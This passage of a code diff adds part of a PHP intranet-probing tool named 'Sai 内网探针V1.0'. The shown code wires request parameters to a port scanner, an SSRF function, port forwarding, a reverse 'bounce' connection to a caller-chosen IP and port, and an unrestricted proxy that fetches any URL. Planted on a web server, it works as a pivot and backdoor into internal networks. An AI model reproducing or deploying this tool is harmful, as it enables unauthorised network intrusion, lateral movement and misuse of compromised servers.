inittab');
+ }else{
+ echo "";
+ }
+ }//==============================在线代理函数====================================
+ function proxy($url){
+ $output=file_get_contents($url);
+ return $output;
+ }//======================================Main===================================
+ $scan=new portScan();
+ if(isset($_POST['submit'])){
+ if($_POST['start']!=""){
+ $scan->Prepare();
+ }else{
+ echo "";
+ }
+ }
+
+ if(isset($_GET['ip'])){
+ $ssrf_ip=$_GET['ip'];
+ if($ssrf_ip!=0){
+ ssrf($ssrf_ip);
+ }
+ }
+
+ if(isset($_POST['trans'])) {
+ tranmit($_POST['sourceip'],$_POST['sourceport'],$_POST['targetip'],$_POST['targetport']);
+ }
+
+ if(isset($_POST['rebound'])){
+ bounce($_POST['tarip'],$_POST['tarport']);
+ }
+ if (isset($_GET['proxy'])) {
+ $proxy_web=proxy($_GET['proxy']);
+ echo "".$proxy_web."
";
+ }?> Sai 内网探针V1.0
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+